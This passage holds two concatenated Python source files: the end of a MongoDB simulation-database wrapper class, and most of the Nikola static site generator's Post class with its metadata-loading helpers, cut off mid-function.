if not isinstance(query, dict):
try:
query = bson.ObjectId(query)
except bson.errors.InvalidId:
pass
query = {'_id': query}
pipeline.append({'$match': query})
if sort:
pipeline.append({'$sort': sort})
if projection:
pipeline.append({'$project': projection})
return self.collection.aggregate(pipeline)
def addentry(self, entry, fmt=''):
""" Insert a new entry into the database
Args:
entry (dict or str): representation of database document to insert
fmt (str): either 'json' or 'dict' are supported.
Returns:
key: the _id for the newly inserted entry
Raises:
NotImplementedError: if fmt is not 'json' or 'dict'
pymongo error: if database insertion fails
"""
if fmt.lower() == 'json':
entry = bson.json_util.loads(entry)
elif fmt.lower() == 'dict':
pass
else:
raise NotImplementedError("Unhandled format %s", fmt)
entry['_inserted'] = str(datetime.datetime.utcnow())
result = self.collection.insert_one(entry)
return str(result.inserted_id)
def __str__(self):
return f"MongoSimsDB({self.collection})"
|
# -*- coding: utf-8 -*-
# Copyright © 2012-2020 Roberto Alsina and others.
# Permission is hereby granted, free of charge, to any
# person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice
# shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""The Post class."""
import io
import datetime
import hashlib
import json
import os
import re
from collections import defaultdict
from math import ceil # for reading time feature
from urllib.parse import urljoin
import dateutil.tz
import lxml.html
import natsort
from blinker import signal
# for tearDown with _reload we cannot use 'from import' to get LocaleBorg
import nikola.utils
from . import metadata_extractors
from . import utils
from .utils import (
current_time,
Functionary,
LOGGER,
LocaleBorg,
slugify,
to_datetime,
demote_headers,
get_translation_candidate,
map_metadata
)
try:
import pyphen
except ImportError:
pyphen = None
__all__ = ('Post',)
TEASER_REGEXP = re.compile(r'<!--\s*(TEASER_END|END_TEASER)(:(.+))?\s*-->', re.IGNORECASE)
class Post(object):
"""Represent a blog post or site page."""
def __init__(
self,
source_path,
config,
destination,
use_in_feeds,
messages,
template_name,
compiler,
destination_base=None,
metadata_extractors_by=None
):
"""Initialize post.
The source path is the user created post file. From it we calculate
the meta file, as well as any translations available, and
the .html fragment file path.
destination_base must be None or a TranslatableSetting instance. If
specified, it will be prepended to the destination path.
"""
self.config = config
self.compiler = compiler
self.compiler_contexts = {}
self.compile_html = self.compiler.compile
self.demote_headers = self.compiler.demote_headers and self.config['DEMOTE_HEADERS']
tzinfo = self.config['__tzinfo__']
if self.config['FUTURE_IS_NOW']:
self.current_time = None
else:
self.current_time = current_time(tzinfo)
self.translated_to = set([])
self._prev_post = None
self._next_post = None
self.base_url = self.config['BASE_URL']
self.is_draft = False
self.is_private = False
self.strip_indexes = self.config['STRIP_INDEXES']
self.index_file = self.config['INDEX_FILE']
self.pretty_urls = self.config['PRETTY_URLS']
self.source_path = source_path # posts/blah.txt
self.post_name = os.path.splitext(source_path)[0] # posts/blah
_relpath = os.path.relpath(self.post_name)
if _relpath != self.post_name:
self.post_name = _relpath.replace('..' + os.sep, '_..' + os.sep)
# cache[\/]posts[\/]blah.html
self.base_path = os.path.join(self.config['CACHE_FOLDER'], self.post_name + ".html")
# cache/posts/blah.html
self._base_path = self.base_path.replace('\\', '/')
self.metadata_path = self.post_name + ".meta" # posts/blah.meta
self.folder_relative = destination
self.folder_base = destination_base
self.default_lang = self.config['DEFAULT_LANG']
self.translations = self.config['TRANSLATIONS']
self.messages = messages
self.skip_untranslated = not self.config['SHOW_UNTRANSLATED_POSTS']
self._template_name = template_name
self.is_two_file = True
self._reading_time = None
self._remaining_reading_time = None
self._paragraph_count = None
self._remaining_paragraph_count = None
self._dependency_file_fragment = defaultdict(list)
self._dependency_file_page = defaultdict(list)
self._dependency_uptodate_fragment = defaultdict(list)
self._dependency_uptodate_page = defaultdict(list)
self._depfile = defaultdict(list)
if metadata_extractors_by is None:
self.metadata_extractors_by = {'priority': {}, 'source': {}}
else:
self.metadata_extractors_by = metadata_extractors_by
# Load internationalized metadata
for lang in self.translations:
if os.path.isfile(get_translation_candidate(self.config, self.source_path, lang)):
self.translated_to.add(lang)
# If we don't have anything in translated_to, the file does not exist
if not self.translated_to and os.path.isfile(self.source_path):
raise Exception(("Could not find translations for {}, check your "
"TRANSLATIONS_PATTERN").format(self.source_path))
elif not self.translated_to:
raise Exception(("Cannot use {} (not a file, perhaps a broken "
"symbolic link?)").format(self.source_path))
default_metadata, default_used_extractor = get_meta(self, lang=None)
self.meta = Functionary(lambda: None, self.default_lang)
self.used_extractor = Functionary(lambda: None, self.default_lang)
self.meta[self.default_lang] = default_metadata
self.used_extractor[self.default_lang] = default_used_extractor
# Compose paths
if self.folder_base is not None:
# Use translatable destination folders
self.folders = {}
for lang in self.config['TRANSLATIONS'].keys():
if os.path.isabs(self.folder_base(lang)): # Issue 2982
self.folder_base[lang] = os.path.relpath(self.folder_base(lang), '/')
self.folders[lang] = os.path.normpath(os.path.join(self.folder_base(lang), self.folder_relative))
else:
# Old behavior (non-translatable destination path, normalized by scanner)
self.folders = {lang: self.folder_relative for lang in self.config['TRANSLATIONS'].keys()}
self.folder = self.folders[self.default_lang]
if 'date' not in default_metadata and not use_in_feeds:
# For pages we don't *really* need a date
if self.config['__invariant__']:
default_metadata['date'] = datetime.datetime(2013, 12, 31, 23, 59, 59, tzinfo=tzinfo)
else:
default_metadata['date'] = datetime.datetime.utcfromtimestamp(
os.stat(self.source_path).st_ctime).replace(tzinfo=dateutil.tz.tzutc()).astimezone(tzinfo)
# If time zone is set, build localized datetime.
try:
self.date = to_datetime(self.meta[self.default_lang]['date'], tzinfo)
except ValueError:
if not self.meta[self.default_lang]['date']:
msg = 'Missing date in file {}'.format(source_path)
else:
msg = "Invalid date '{0}' in file {1}".format(self.meta[self.default_lang]['date'], source_path)
LOGGER.error(msg)
raise ValueError(msg)
if 'updated' not in default_metadata:
default_metadata['updated'] = default_metadata.get('date', None)
self.updated = to_datetime(default_metadata['updated'], tzinfo)
if 'title' not in default_metadata or 'slug' not in default_metadata \
or 'date' not in default_metadata:
raise ValueError("You must set a title (found '{0}'), a slug (found '{1}') and a date (found '{2}')! "
"[in file {3}]".format(default_metadata.get('title', None),
default_metadata.get('slug', None),
default_metadata.get('date', None),
source_path))
if 'type' not in default_metadata:
# default value is 'text'
default_metadata['type'] = 'text'
for lang in self.translations:
if lang != self.default_lang:
meta = defaultdict(lambda: '')
meta.update(default_metadata)
_meta, _extractors = get_meta(self, lang)
meta.update(_meta)
self.meta[lang] = meta
self.used_extractor[lang] = _extractors
if not self.is_translation_available(self.default_lang):
# Special case! (Issue #373)
# Fill default_metadata with stuff from the other languages
for lang in sorted(self.translated_to):
default_metadata.update(self.meta[lang])
# Load data field from metadata
self.data = Functionary(lambda: None, self.default_lang)
for lang in self.translations:
if self.meta[lang].get('data') is not None:
self.data[lang] = utils.load_data(self.meta[lang]['data'])
for lang, meta in self.meta.items():
# Migrate section to category
# TODO: remove in v9
if 'section' in meta:
if 'category' in meta:
LOGGER.warning("Post {0} has both 'category' and 'section' metadata. Section will be ignored.".format(source_path))
else:
meta['category'] = meta['section']
LOGGER.info("Post {0} uses 'section' metadata, setting its value to 'category'".format(source_path))
# Handle CATEGORY_DESTPATH_AS_DEFAULT
if 'category' not in meta and self.config['CATEGORY_DESTPATH_AS_DEFAULT']:
self.category_from_destpath = True
if self.config['CATEGORY_DESTPATH_TRIM_PREFIX'] and self.folder_relative != '.':
category = self.folder_relative
else:
category = self.folders[lang]
category = category.replace(os.sep, '/')
if self.config['CATEGORY_DESTPATH_FIRST_DIRECTORY_ONLY']:
category = category.split('/')[0]
meta['category'] = self.config['CATEGORY_DESTPATH_NAMES'](lang).get(category, category)
else:
self.category_from_destpath = False
self.publish_later = False if self.current_time is None else self.date >= self.current_time
self.is_draft = False
self.is_private = False
self.post_status = 'published'
self._tags = {}
self.has_oldstyle_metadata_tags = False
for lang in self.translated_to:
if isinstance(self.meta[lang]['tags'], (list, tuple, set)):
_tag_list = self.meta[lang]['tags']
else:
_tag_list = self.meta[lang]['tags'].split(',')
self._tags[lang] = natsort.natsorted(
list(set([x.strip() for x in _tag_list])),
alg=natsort.ns.F | natsort.ns.IC)
self._tags[lang] = [t for t in self._tags[lang] if t]
status = self.meta[lang].get('status')
if status:
if status == 'published':
pass # already set before, mixing published + something else should result in the other thing
elif status == 'featured':
self.post_status = status
elif status == 'private':
self.post_status = status
self.is_private = True
elif status == 'draft':
self.post_status = status
self.is_draft = True
else:
LOGGER.warning(('The post "{0}" has the unknown status "{1}". '
'Valid values are "published", "featured", "private" and "draft".').format(self.source_path, status))
if self.config['WARN_ABOUT_TAG_METADATA']:
show_warning = False
if 'draft' in [_.lower() for _ in self._tags[lang]]:
LOGGER.warning('The post "{0}" uses the "draft" tag.'.format(self.source_path))
show_warning = True
if 'private' in self._tags[lang]:
LOGGER.warning('The post "{0}" uses the "private" tag.'.format(self.source_path))
show_warning = True
if 'mathjax' in self._tags[lang]:
LOGGER.warning('The post "{0}" uses the "mathjax" tag.'.format(self.source_path))
show_warning = True
if show_warning:
LOGGER.warning('It is suggested that you convert special tags to metadata and set '
'USE_TAG_METADATA to False. You can use the upgrade_metadata_v8 '
'command plugin for conversion (install with: nikola plugin -i '
'upgrade_metadata_v8). Change the WARN_ABOUT_TAG_METADATA '
'configuration to disable this warning.')
if self.config['USE_TAG_METADATA']:
if 'draft' in [_.lower() for _ in self._tags[lang]]:
self.is_draft = True
LOGGER.debug('The post "{0}" is a draft.'.format(self.source_path))
self._tags[lang].remove('draft')
self.post_status = 'draft'
self.has_oldstyle_metadata_tags = True
if 'private' in self._tags[lang]:
self.is_private = True
LOGGER.debug('The post "{0}" is private.'.format(self.source_path))
self._tags[lang].remove('private')
self.post_status = 'private'
self.has_oldstyle_metadata_tags = True
if 'mathjax' in self._tags[lang]:
self.has_oldstyle_metadata_tags = True
# While draft comes from the tags, it's not really a tag
self.is_post = use_in_feeds
self.use_in_feeds = self.is_post and not self.is_draft and not self.is_private and not self.publish_later
# Allow overriding URL_TYPE via meta
# The check is done here so meta dicts won’t change inside of
        # generic_post_renderer
self.url_type = self.meta('url_type') or None
# Register potential extra dependencies
self.compiler.register_extra_dependencies(self)
def _get_hyphenate(self):
return bool(self.config['HYPHENATE'] or self.meta('hyphenate'))
hyphenate = property(_get_hyphenate)
def __repr__(self):
"""Provide a representation of the post object."""
# Calculate a hash that represents most data about the post
m = hashlib.md5()
# source_path modification date (to avoid reading it)
m.update(str(os.stat(self.source_path).st_mtime).encode('utf-8'))
clean_meta = {}
for k, v in self.meta.items():
sub_meta = {}
clean_meta[k] = sub_meta
for kk, vv in v.items():
if vv:
sub_meta[kk] = vv
m.update(str(json.dumps(clean_meta, cls=utils.CustomEncoder, sort_keys=True)).encode('utf-8'))
return '<Post: {0!r} {1}>'.format(self.source_path, m.hexdigest())
def has_pretty_url(self, lang):
"""Check if this page has a pretty URL."""
m = self.meta[lang].get('pretty_url', '')
if m:
            # match is a non-empty string, overrides anything
return m.lower() == 'true' or m.lower() == 'yes'
else:
# use PRETTY_URLS, unless the slug is 'index'
return self.pretty_urls and self.meta[lang]['slug'] != 'index'
def _has_pretty_url(self, lang):
"""Check if this page has a pretty URL."""
return self.has_pretty_url(lang)
@property
def has_math(self):
"""Return True if this post has has_math set to True or is a python notebook.
Alternatively, it will return True if it has set the mathjax tag in the
current language and the USE_TAG_METADATA config setting is True.
"""
if self.compiler.name == 'ipynb':
return True
lang = nikola.utils.LocaleBorg().current_lang
if self.is_translation_available(lang):
if self.meta[lang].get('has_math') in ('true', 'True', 'yes', '1', 1, True):
return True
if self.config['USE_TAG_METADATA']:
return 'mathjax' in self.tags_for_language(lang)
# If it has math in ANY other language, enable it. Better inefficient than broken.
for lang in self.translated_to:
if self.meta[lang].get('has_math') in ('true', 'True', 'yes', '1', 1, True):
return True
if self.config['USE_TAG_METADATA']:
return 'mathjax' in self.alltags
return False
@property
def alltags(self):
"""Return ALL the tags for this post."""
tags = []
for l in self._tags:
tags.extend(self._tags[l])
return list(set(tags))
def tags_for_language(self, lang):
"""Return tags for a given language."""
if lang in self._tags:
return self._tags[lang]
elif lang not in self.translated_to and self.skip_untranslated:
return []
elif self.default_lang in self._tags:
return self._tags[self.default_lang]
else:
return []
@property
def tags(self):
"""Return tags for the current language."""
lang = nikola.utils.LocaleBorg().current_lang
return self.tags_for_language(lang)
@property
def prev_post(self):
"""Return previous post."""
lang = nikola.utils.LocaleBorg().current_lang
rv = self._prev_post
while self.skip_untranslated:
if rv is None:
break
if rv.is_translation_available(lang):
break
rv = rv._prev_post
return rv
@prev_post.setter
def prev_post(self, v):
"""Set previous post."""
self._prev_post = v
@property
def next_post(self):
"""Return next post."""
lang = nikola.utils.LocaleBorg().current_lang
rv = self._next_post
while self.skip_untranslated:
if rv is None:
break
if rv.is_translation_available(lang):
break
rv = rv._next_post
return rv
@next_post.setter
def next_post(self, v):
"""Set next post."""
self._next_post = v
@property
def template_name(self):
"""Return template name for this post."""
lang = nikola.utils.LocaleBorg().current_lang
return self.meta[lang]['template'] or self._template_name
def formatted_date(self, date_format, date=None):
"""Return the formatted date as string."""
return utils.LocaleBorg().formatted_date(date_format, date if date else self.date)
def formatted_updated(self, date_format):
"""Return the updated date as string."""
return self.formatted_date(date_format, self.updated)
def title(self, lang=None):
"""Return localized title.
If lang is not specified, it defaults to the current language from
templates, as set in LocaleBorg.
"""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
return self.meta[lang]['title']
def author(self, lang=None):
"""Return localized author or BLOG_AUTHOR if unspecified.
If lang is not specified, it defaults to the current language from
templates, as set in LocaleBorg.
"""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
if self.meta[lang]['author']:
author = self.meta[lang]['author']
else:
author = self.config['BLOG_AUTHOR'](lang)
return author
def description(self, lang=None):
"""Return localized description."""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
return self.meta[lang]['description']
def guid(self, lang=None):
"""Return localized GUID."""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
if self.meta[lang]['guid']:
guid = self.meta[lang]['guid']
else:
guid = self.permalink(lang, absolute=True)
return guid
def add_dependency(self, dependency, add='both', lang=None):
"""Add a file dependency for tasks using that post.
The ``dependency`` should be a string specifying a path, or a callable
which returns such a string or a list of strings.
The ``add`` parameter can be 'both', 'fragment' or 'page', to indicate
that this dependency shall be used
* when rendering the fragment to HTML ('fragment' and 'both'), or
* when creating a page with parts of the ``Post`` embedded, which
includes the HTML resulting from compiling the fragment ('page' or
'both').
If ``lang`` is not specified, this dependency is added for all languages.
"""
if add not in {'fragment', 'page', 'both'}:
raise Exception("Add parameter is '{0}', but must be either 'fragment', 'page', or 'both'.".format(add))
if add == 'fragment' or add == 'both':
self._dependency_file_fragment[lang].append((type(dependency) != str, dependency))
if add == 'page' or add == 'both':
self._dependency_file_page[lang].append((type(dependency) != str, dependency))
def add_dependency_uptodate(self, dependency, is_callable=False, add='both', lang=None):
"""Add a dependency for task's ``uptodate`` for tasks using that post.
This can be for example an ``utils.config_changed`` object, or a list of
such objects.
The ``is_callable`` parameter specifies whether ``dependency`` is a
callable which generates an entry or a list of entries for the ``uptodate``
list, or whether it is an entry which can directly be added (as a single
object or a list of objects).
The ``add`` parameter can be 'both', 'fragment' or 'page', to indicate
that this dependency shall be used
* when rendering the fragment to HTML ('fragment' and 'both'), or
* when creating a page with parts of the ``Post`` embedded, which
includes the HTML resulting from compiling the fragment ('page' or
'both').
If ``lang`` is not specified, this dependency is added for all languages.
Example:
post.add_dependency_uptodate(
utils.config_changed({1: some_data}, 'uniqueid'), False, 'page')
"""
if add == 'fragment' or add == 'both':
self._dependency_uptodate_fragment[lang].append((is_callable, dependency))
if add == 'page' or add == 'both':
self._dependency_uptodate_page[lang].append((is_callable, dependency))
def register_depfile(self, dep, dest=None, lang=None):
"""Register a dependency in the dependency file."""
if not dest:
dest = self.translated_base_path(lang)
self._depfile[dest].append(dep)
@staticmethod
def write_depfile(dest, deps_list, post=None, lang=None):
"""Write a depfile for a given language."""
if post is None or lang is None:
deps_path = dest + '.dep'
else:
deps_path = post.compiler.get_dep_filename(post, lang)
if deps_list or (post.compiler.use_dep_file if post else False):
deps_list = [p for p in deps_list if p != dest] # Don't depend on yourself (#1671)
with io.open(deps_path, "w+", encoding="utf8") as deps_file:
deps_file.write('\n'.join(deps_list))
else:
if os.path.isfile(deps_path):
os.unlink(deps_path)
def _get_dependencies(self, deps_list):
deps = []
for dep in deps_list:
if dep[0]:
# callable
result = dep[1]()
else:
# can add directly
result = dep[1]
# if result is a list, add its contents
if type(result) == list:
deps.extend(result)
else:
deps.append(result)
return deps
def deps(self, lang):
"""Return a list of file dependencies to build this post's page."""
deps = []
deps.append(self.base_path)
deps.append(self.source_path)
if os.path.exists(self.metadata_path):
deps.append(self.metadata_path)
if lang != self.default_lang:
cand_1 = get_translation_candidate(self.config, self.source_path, lang)
cand_2 = get_translation_candidate(self.config, self.base_path, lang)
if os.path.exists(cand_1):
deps.extend([cand_1, cand_2])
cand_3 = get_translation_candidate(self.config, self.metadata_path, lang)
if os.path.exists(cand_3):
deps.append(cand_3)
if self.meta('data', lang):
deps.append(self.meta('data', lang))
deps += self._get_dependencies(self._dependency_file_page[lang])
deps += self._get_dependencies(self._dependency_file_page[None])
return sorted(set(deps))
def deps_uptodate(self, lang):
"""Return a list of uptodate dependencies to build this post's page.
These dependencies should be included in ``uptodate`` for the task
which generates the page.
"""
deps = []
deps += self._get_dependencies(self._dependency_uptodate_page[lang])
deps += self._get_dependencies(self._dependency_uptodate_page[None])
deps.append(utils.config_changed({1: sorted(self.compiler.config_dependencies)}, 'nikola.post.Post.deps_uptodate:compiler:' + self.source_path))
return deps
def compile(self, lang):
"""Generate the cache/ file with the compiled post."""
dest = self.translated_base_path(lang)
if not self.is_translation_available(lang) and not self.config['SHOW_UNTRANSLATED_POSTS']:
return
# Set the language to the right thing
LocaleBorg().set_locale(lang)
self.compile_html(
self.translated_source_path(lang),
dest,
self.is_two_file,
self,
lang)
Post.write_depfile(dest, self._depfile[dest], post=self, lang=lang)
signal('compiled').send({
'source': self.translated_source_path(lang),
'dest': dest,
'post': self,
'lang': lang,
})
if self.publish_later:
LOGGER.info('{0} is scheduled to be published in the future ({1})'.format(
self.source_path, self.date))
def fragment_deps(self, lang):
"""Return a list of dependencies to build this post's fragment."""
deps = [self.source_path]
if os.path.isfile(self.metadata_path):
deps.append(self.metadata_path)
lang_deps = []
if lang != self.default_lang:
lang_deps = [get_translation_candidate(self.config, d, lang) for d in deps]
deps += lang_deps
deps = [d for d in deps if os.path.exists(d)]
deps += self._get_dependencies(self._dependency_file_fragment[lang])
deps += self._get_dependencies(self._dependency_file_fragment[None])
return sorted(deps)
def fragment_deps_uptodate(self, lang):
"""Return a list of file dependencies to build this post's fragment."""
deps = []
deps += self._get_dependencies(self._dependency_uptodate_fragment[lang])
deps += self._get_dependencies(self._dependency_uptodate_fragment[None])
deps.append(utils.config_changed({1: sorted(self.compiler.config_dependencies)}, 'nikola.post.Post.deps_uptodate:compiler:' + self.source_path))
return deps
def is_translation_available(self, lang):
"""Return True if the translation actually exists."""
return lang in self.translated_to
def translated_source_path(self, lang):
"""Return path to the translation's source file."""
if lang in self.translated_to:
if lang == self.default_lang:
return self.source_path
else:
return get_translation_candidate(self.config, self.source_path, lang)
elif lang != self.default_lang:
return self.source_path
else:
return get_translation_candidate(self.config, self.source_path, sorted(self.translated_to)[0])
def translated_base_path(self, lang):
"""Return path to the translation's base_path file."""
return get_translation_candidate(self.config, self.base_path, lang)
def _translated_file_path(self, lang):
"""Return path to the translation's file, or to the original."""
if lang in self.translated_to:
if lang == self.default_lang:
return self.base_path
else:
return get_translation_candidate(self.config, self.base_path, lang)
elif lang != self.default_lang:
return self.base_path
else:
return get_translation_candidate(self.config, self.base_path, sorted(self.translated_to)[0])
def text(self, lang=None, teaser_only=False, strip_html=False, show_read_more_link=True,
feed_read_more_link=False, feed_links_append_query=None):
"""Read the post file for that language and return its contents.
teaser_only=True breaks at the teaser marker and returns only the teaser.
strip_html=True removes HTML tags
show_read_more_link=False does not add the Read more... link
feed_read_more_link=True uses FEED_READ_MORE_LINK instead of INDEX_READ_MORE_LINK
        lang=None uses the currently set locale
All links in the returned HTML will be relative.
The HTML returned is a bare fragment, not a full document.
"""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
file_name = self._translated_file_path(lang)
# Yes, we compile it and screw it.
# This may be controversial, but the user (or someone) is asking for the post text
# and the post should not just refuse to give it.
if not os.path.isfile(file_name):
self.compile(lang)
with io.open(file_name, "r", encoding="utf8") as post_file:
data = post_file.read().strip()
if self.compiler.extension() == '.php':
return data
try:
document = lxml.html.fragment_fromstring(data, "body")
except lxml.etree.ParserError as e:
# if we don't catch this, it breaks later (Issue #374)
if str(e) == "Document is empty":
return ""
# let other errors raise
raise
base_url = self.permalink(lang=lang)
document.make_links_absolute(base_url)
if self.hyphenate:
hyphenate(document, lang)
try:
data = lxml.html.tostring(document.body, encoding='unicode')
except Exception:
data = lxml.html.tostring(document, encoding='unicode')
if teaser_only:
teaser_regexp = self.config.get('TEASER_REGEXP', TEASER_REGEXP)
teaser = teaser_regexp.split(data)[0]
if teaser != data:
if not strip_html and show_read_more_link:
if teaser_regexp.search(data).groups()[-1]:
teaser_text = teaser_regexp.search(data).groups()[-1]
else:
teaser_text = self.messages[lang]["Read more"]
l = self.config['FEED_READ_MORE_LINK'](lang) if feed_read_more_link else self.config['INDEX_READ_MORE_LINK'](lang)
teaser += l.format(
link=self.permalink(lang, query=feed_links_append_query),
read_more=teaser_text,
min_remaining_read=self.messages[lang]["%d min remaining to read"] % (self.remaining_reading_time),
reading_time=self.reading_time,
remaining_reading_time=self.remaining_reading_time,
paragraph_count=self.paragraph_count,
remaining_paragraph_count=self.remaining_paragraph_count,
post_title=self.title(lang))
# This closes all open tags and sanitizes the broken HTML
document = lxml.html.fromstring(teaser)
try:
data = lxml.html.tostring(document.body, encoding='unicode')
except IndexError:
data = lxml.html.tostring(document, encoding='unicode')
if data and strip_html:
try:
# Not all posts have a body. For example, you may have a page statically defined in the template that does not take content as input.
content = lxml.html.fromstring(data)
data = content.text_content().strip() # No whitespace wanted.
except (lxml.etree.ParserError, ValueError):
data = ""
elif data:
if self.demote_headers:
# see above
try:
document = lxml.html.fromstring(data)
demote_headers(document, self.demote_headers)
data = lxml.html.tostring(document.body, encoding='unicode')
except (lxml.etree.ParserError, IndexError):
data = lxml.html.tostring(document, encoding='unicode')
return data
@property
def reading_time(self):
"""Return reading time based on length of text."""
if self._reading_time is None:
text = self.text(strip_html=True)
words_per_minute = 220
words = len(text.split())
markup = lxml.html.fromstring(self.text(strip_html=False))
embeddables = [".//img", ".//picture", ".//video", ".//audio", ".//object", ".//iframe"]
media_time = 0
for embedded in embeddables:
                media_time += (len(markup.findall(embedded)) * 0.33)  # 0.33 min ≈ 20 seconds per embedded element
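            # Illustrative example (numbers are not from the source): a 440-word post with one
            # image gives ceil(440 / 220 + 0.33) = ceil(2.33) = 3 minutes.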
self._reading_time = int(ceil((words / words_per_minute) + media_time)) or 1
return self._reading_time
@property
def remaining_reading_time(self):
"""Remaining reading time based on length of text (does not include teaser)."""
if self._remaining_reading_time is None:
text = self.text(teaser_only=True, strip_html=True)
words_per_minute = 220
words = len(text.split())
self._remaining_reading_time = self.reading_time - int(ceil(words / words_per_minute)) or 1
return self._remaining_reading_time
@property
def paragraph_count(self):
"""Return the paragraph count for this post."""
if self._paragraph_count is None:
# duplicated with Post.text()
lang = nikola.utils.LocaleBorg().current_lang
file_name = self._translated_file_path(lang)
with io.open(file_name, "r", encoding="utf8") as post_file:
data = post_file.read().strip()
try:
document = lxml.html.fragment_fromstring(data, "body")
except lxml.etree.ParserError as e:
# if we don't catch this, it breaks later (Issue #374)
if str(e) == "Document is empty":
return ""
# let other errors raise
raise
# output is a float, for no real reason at all
self._paragraph_count = int(document.xpath('count(//p)'))
return self._paragraph_count
@property
def remaining_paragraph_count(self):
"""Return the remaining paragraph count for this post (does not include teaser)."""
if self._remaining_paragraph_count is None:
try:
# Just asking self.text() is easier here.
document = lxml.html.fragment_fromstring(self.text(teaser_only=True, show_read_more_link=False), "body")
except lxml.etree.ParserError as e:
# if we don't catch this, it breaks later (Issue #374)
if str(e) == "Document is empty":
return ""
# let other errors raise
raise
self._remaining_paragraph_count = self.paragraph_count - int(document.xpath('count(//p)'))
return self._remaining_paragraph_count
def source_link(self, lang=None):
"""Return absolute link to the post's source."""
ext = self.source_ext(True)
link = "/" + self.destination_path(lang=lang, extension=ext, sep='/')
link = utils.encodelink(link)
return link
def destination_path(self, lang=None, extension='.html', sep=os.sep):
"""Destination path for this post, relative to output/.
If lang is not specified, it's the current language.
Extension is used in the path if specified.
"""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
folder = self.folders[lang]
if self.has_pretty_url(lang):
path = os.path.join(self.translations[lang],
folder, self.meta[lang]['slug'], 'index' + extension)
else:
path = os.path.join(self.translations[lang],
folder, self.meta[lang]['slug'] + extension)
if sep != os.sep:
path = path.replace(os.sep, sep)
if path.startswith('./'):
path = path[2:]
return path
def permalink(self, lang=None, absolute=False, extension='.html', query=None):
"""Return permalink for a post."""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
# Let compilers override extension (e.g. the php compiler)
if self.compiler.extension() != '.html':
extension = self.compiler.extension()
pieces = self.translations[lang].split(os.sep)
pieces += self.folders[lang].split(os.sep)
if self.has_pretty_url(lang):
pieces += [self.meta[lang]['slug'], 'index' + extension]
else:
pieces += [self.meta[lang]['slug'] + extension]
pieces = [_f for _f in pieces if _f and _f != '.']
link = '/' + '/'.join(pieces)
if absolute:
link = urljoin(self.base_url, link[1:])
index_len = len(self.index_file)
if self.strip_indexes and link[-(1 + index_len):] == '/' + self.index_file:
link = link[:-index_len]
if query:
link = link + "?" + query
link = utils.encodelink(link)
return link
@property
def previewimage(self, lang=None):
"""Return the previewimage path."""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
image_path = self.meta[lang]['previewimage']
if not image_path:
return None
# This is further parsed by the template, because we don’t have access
# to the URL replacer here. (Issue #1473)
return image_path
def source_ext(self, prefix=False):
"""Return the source file extension.
If `prefix` is True, a `.src.` prefix will be added to the resulting extension
if it's equal to the destination extension.
"""
ext = os.path.splitext(self.source_path)[1]
# do not publish PHP sources
if prefix and ext == '.html':
# ext starts with a dot
return '.src' + ext
else:
return ext
def get_metadata_from_file(source_path, post, config, lang, metadata_extractors_by):
"""Extract metadata from the file itself, by parsing contents."""
try:
if lang and config:
source_path = get_translation_candidate(config, source_path, lang)
elif lang:
source_path += '.' + lang
with io.open(source_path, "r", encoding="utf-8-sig") as meta_file:
source_text = meta_file.read()
except (UnicodeDecodeError, UnicodeEncodeError):
msg = 'Error reading {0}: Nikola only supports UTF-8 files'.format(source_path)
LOGGER.error(msg)
raise ValueError(msg)
except Exception: # The file may not exist, for multilingual sites
return {}, None
meta = {}
used_extractor = None
for priority in metadata_extractors.MetaPriority:
found_in_priority = False
for extractor in metadata_extractors_by['priority'].get(priority, []):
if not metadata_extractors.check_conditions(post, source_path, extractor.conditions, config, source_text):
continue
extractor.check_requirements()
new_meta = extractor.extract_text(source_text)
if new_meta:
found_in_priority = True
used_extractor = extractor
# Map metadata from other platforms to names Nikola expects (Issue #2817)
# Map metadata values (Issue #3025)
map_metadata(new_meta, extractor.map_from, config)
meta.update(new_meta)
break
if found_in_priority:
break
return meta, used_extractor
def get_metadata_from_meta_file(path, post, config, lang, metadata_extractors_by=None):
"""Take a post path, and gets data from a matching .meta file."""
meta_path = os.path.splitext(path)[0] + '.meta'
if lang and config:
meta_path = get_translation_candidate(config, meta_path, lang)
elif lang:
meta_path += '.' + lang
if os.path.isfile(meta_path):
return get_metadata_from_file(meta_path, post, config, lang, metadata_extractors_by)
elif lang:
        # The metadata file doesn't exist, but this is not the default language.
        # So, if default-language metadata exists, return that instead.
        # This makes the 2-file format detection more reliable (Issue #525)
return get_metadata_from_meta_file(meta_path, post, config, None, metadata_extractors_by)
else: # No 2-file metadata
return {}, None
def get_meta(post, lang):
"""Get post meta from compiler or source file."""
meta = defaultdict(lambda: '')
used_extractor = None
config = getattr(post, 'config', None)
    metadata_extractors_by = getattr(post, 'metadata_extractors_by', None)
if metadata_extractors_by is None:
metadata_extractors_by = metadata_extractors.default_metadata_extractors_by()
# If meta file exists, use it
metafile_meta, used_extractor = get_metadata_from_meta_file(post.metadata_path, post, config, lang, metadata_extractors_by)
is_two_file = bool(metafile_meta)
# Filename-based metadata extractors (priority 1).
if config.get('FILE_METADATA_REGEXP'):
extractors = metadata_extractors_by['source'].get(metadata_extractors.MetaSource.filename, [])
for extractor in extractors:
if not metadata_extractors.check_conditions(post, post.source_path, extractor.conditions, config, None):
continue
meta.update(extractor.extract_filename(post.source_path, lang))
# Fetch compiler metadata (priority 2, overrides filename-based metadata).
compiler_meta = {}
if (getattr(post, 'compiler', None) and post.compiler.supports_metadata and
